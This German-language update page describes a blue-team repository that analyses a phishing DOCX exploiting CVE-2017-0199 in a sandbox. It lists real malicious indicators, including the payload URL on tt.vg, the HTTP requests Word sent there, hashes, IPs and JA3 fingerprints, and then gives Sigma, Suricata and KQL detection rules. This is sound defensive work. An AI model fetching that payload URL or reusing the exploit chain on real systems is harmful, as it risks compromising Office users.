Zurück zu den Updates
UpdatedJul 28, 2026

RCE-CVE-2017-0199-detection-analysis — Updated!

Dieses Repository enthält eine vollständige Blue-Team-Malware-Analyse eines echten schädlichen DOCX, das CVE-2017-0199 ausnutzt. Das Labor umfasst Sandbox-Ausführung, Netzwerk-Forensik, IOC-Extraktion, MITRE ATT&CK-Zuordnung, Überprüfung der abgelegten Dateien und Erkennungsregeln. Beweisscreenshots sind im Ordner evidence für eine professionelle Dokumentation enthalten.

Teilen

🛡️ BankPaymAdviceVend.Report.docx CVE-2017-0199 – Vollständige Blue-Team-Sandbox-Analyse

Fortgeschrittene Malware-Detonation • Exploit-Verhalten • IOCs • Detection Engineering



🎯 1. Zusammenfassung

Dieses Repository dokumentiert eine **echte schädliche DOCX**-Datei, die die **CVE-2017-0199**-Schwachstelle (Remote Code Execution in Microsoft Office) ausnutzt. Die Probe wurde in einer **Windows 10 ANY.RUN-Sandbox** zur Detonation gebracht und legte Folgendes offen:

✔ Vollständige Exploit-Kette
✔ Netzwerk-Callbacks an die schädliche Domain (tt.vg)
✔ Abgelegte Dateien & temporäre Artefakte
✔ JA3-Fingerprints
✔ Registry-Aktivitäten
✔ HTTP/HTTPS-Beaconing von WINWORD.EXE
✔ Vollständige Blue-Team-IOCs & Erkennungsregeln


🔍 2. Szenario-Hintergrund

Ein Dokument mit dem Titel „BankPaymAdviceVend.Report.docx“ wurde über eine Phishing-E-Mail empfangen.
Nach der Detonation markierte ANY.RUN es sofort als bösartig (Malicious) und verknüpfte es mit:

  • CVE-2017-0199 Word-RCE-Exploit
  • WINWORD.EXE stellt verdeckte HTTP/HTTPS-Verbindungen her
  • Kontaktaufnahme mit der schädlichen Kurzdomain tt.vg
  • Versuchter Abruf der entfernten Payload /BVhaS


📄 3. Informationen zur Probe

FeldWert
DateiBankPaymAdviceVend.Report.docx
BewertungSchädliche Aktivität
Tagscve-2017-0199, exploit
MD522EDED727467A9A26F3FD311A12A7E
SHA16738D1A969193459C7C7579956269D77FED8D26F
SHA2562E1408013503C...3D6EAF9
SandboxWindows 10 Pro x64
VerhaltenExploit → Netzwerk-Beaconing → Abgelegte Dateien

🧬 4. Angriffskette (Übersichtsdiagramm)

[ Schädliche DOCX-Datei ] │ ▼ [ Benutzer öffnet sie in Word ] │ ▼ [ CVE-2017-0199-Exploit wird ausgelöst ] │ ▼ [ WINWORD.EXE → tt.vg über HTTP/HTTPS ] │ ▼ [ Entfernter Pfad: /BVhaS (GET / HEAD / OPTIONS) ] │ ▼ [ Temporäre Dateien, EMF-Objekte und Cache-Dateien werden abgelegt ] │ ▼ [ Mögliche Payload der nächsten Stufe — Server antwortete mit 404 ]

yaml Copy code


🌐 5. Netzwerkverhalten

5.1 DNS-Anfragen

Nur eine Domain war schädlich:

DomainReputation
tt.vg🔴 schädlich

Aufgelöste IPs:

188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)

yaml Copy code


📡 5.2 HTTP/HTTPS-Beaconing

Word versuchte Folgendes abzurufen:

GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 spoof

yaml Copy code

Typische erfasste Anfrage:

GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg

arduino Copy code

Server antwortete:

HTTP/1.1 404 Not Found

yaml Copy code


📁 6. Abgelegte Dateien

Bemerkenswerte Artefakte

  • Mehrere .tmp-Dateien
  • Office-.glox-Grafikobjekte
  • EMF-Bilder im Browser-Cache:
    %LOCALAPPDATA%\INetCache\Content.MSO\*.emf
  • Verknüpfung für zuletzt verwendete Dokumente (.LNK)
  • index.dat-Protokolle
  • Änderungen am Office-Proofing-Wörterbuch

🔐 7. Registry- & Systemverhalten

Word griff auf Folgendes zu:

HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...

yaml Copy code

✔ Für Office normal
❌ In Kombination mit dem Exploit = eindeutig schädliches Verhalten


💣 8. Exploit-Analyse — CVE-2017-0199

Typ: Remote-Codeausführung
Auslöser: Schädliche DOCX-Datei lädt entfernte HTA ohne Benutzerinteraktion
Betroffen: Microsoft Word 2007–2016
Auswirkung: Angreifer führt beliebigen Code aus

Diese Probe versucht, eine entfernte Payload von folgender Adresse zu laden:

http://tt.vg/BVhaS

yaml Copy code


🧩 9. IOCs

🔥 9.1 Netzwerk-Indikatoren

Domain: tt.vg

URLs: http://tt.vg/BVhaS https://tt.vg/BVhaS

IPs: 188.114.96.3 188.114.97.3 172.67.138.42

shell Copy code

🔐 9.2 JA3-SSL-Fingerprints

091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...

yaml Copy code


🔍 10. Erkennungsideen (Sigma / Suricata / EDR)

Dieser Abschnitt wandelt die technische Analyse von BankPaymAdviceVend.Report.docx in praktische, produktionsreife Erkennungsartefakte um, die ein SOC oder Blue Team sofort einsetzen kann. Enthalten sind Sigma-Regeln, Suricata-IDS-Signaturen und EDR-Hunting-Abfragen.


🧾 10.1 Sigma-Regel — WINWORD → tt.vg

Diese Sigma-Regel erkennt jede Netzwerkverbindung, die von WINWORD.EXE in Windows-Netzwerkprotokollen zur verdächtigen Kurzdomain tt.vg aufgebaut wird.

title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental

logsource:
  category: network_connection
  product: windows

detection:
  selection:
    Image|endswith: '\WINWORD.EXE'
    DestinationHostname: 'tt.vg'
  condition: selection

level: high
tags:
  - attack.command_and_control
  - attack.t1071.001
  - cve.2017-0199

💡 Jedes veraltete Office-System, das über WINWORD.EXE Kontakt zu tt.vg aufnimmt, sollte eine sofortige Untersuchung auslösen.


🌐 10.2 Suricata-Regel — HTTP GET /BVhaS auf tt.vg

Eine Suricata-IDS-Regel, die eine von Office ausgehende Anfrage für GET /BVhaS auf der schädlichen Domain tt.vg erkennt. Damit wird der versuchte Payload-Abruf des Exploits erfasst.

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
    flow:established,to_server;
    http.method; content:"GET";
    http.uri; content:"/BVhaS"; nocase;
    http.host; content:"tt.vg"; nocase;
    http.user_agent; content:"MSOffice"; nocase;
    reference:cve,2017-0199;
    classtype:trojan-activity;
    sid:4200010;
    rev:1;
)

🔥 Äußerst effektiv in Umgebungen, die Suricata oder Zeek zur Überwachung des ausgehenden Datenverkehrs einsetzen.


🛰️ 10.3 EDR-Hunting-Abfrage — WINWORD + tt.vg-Indikatoren

Eine KQL-Hunting-Abfrage (Microsoft Defender), mit der jedes Gerät in der Umgebung identifiziert wird, das ein ähnliches schädliches Beaconing zu tt.vg oder den zugehörigen IP-Adressen aufweist.

DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
   or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")

🎯 Zweck: eine einzelne Sandbox-Detonation zu einem vollständigen unternehmensweiten Hunt ausweiten.


🧩 11. Was dieses Labor demonstriert

Dieses Labor demonstriert Ihre Fähigkeit, eine reale Phishing-DOCX-Probe Ende-zu-Ende zu analysieren, und folgt dabei einer vollständigen SOC-tauglichen Methodik:

  • Verstehen, wie CVE-2017-0199 in Microsoft Word ausgelöst wird.
  • Nachverfolgen, wie WINWORD.EXE zu einem unerwarteten HTTP/S-Client wird.
  • Extrahieren von Netzwerk-IOCs (Domains, URLs, IPs, JA3-TLS-Hashes).
  • Analysieren von abgelegten Dateien, zuletzt verwendeten Verknüpfungen und Registry-Zugriffen auf ihren forensischen Wert.
  • Überführen aller Erkenntnisse in Sigma-Regeln, Suricata-Signaturen und EDR-Hunting-Abfragen.

Mit anderen Worten — dieses Labor endet nicht bei der Detonation. Es extrahiert echte, umsetzbare Erkennungsinformationen (Detection Intelligence), genau wie ein professioneller SOC-Analyst.


Entworfen & dokumentiert von Ahmed Tarek — Blue Team

Kategorien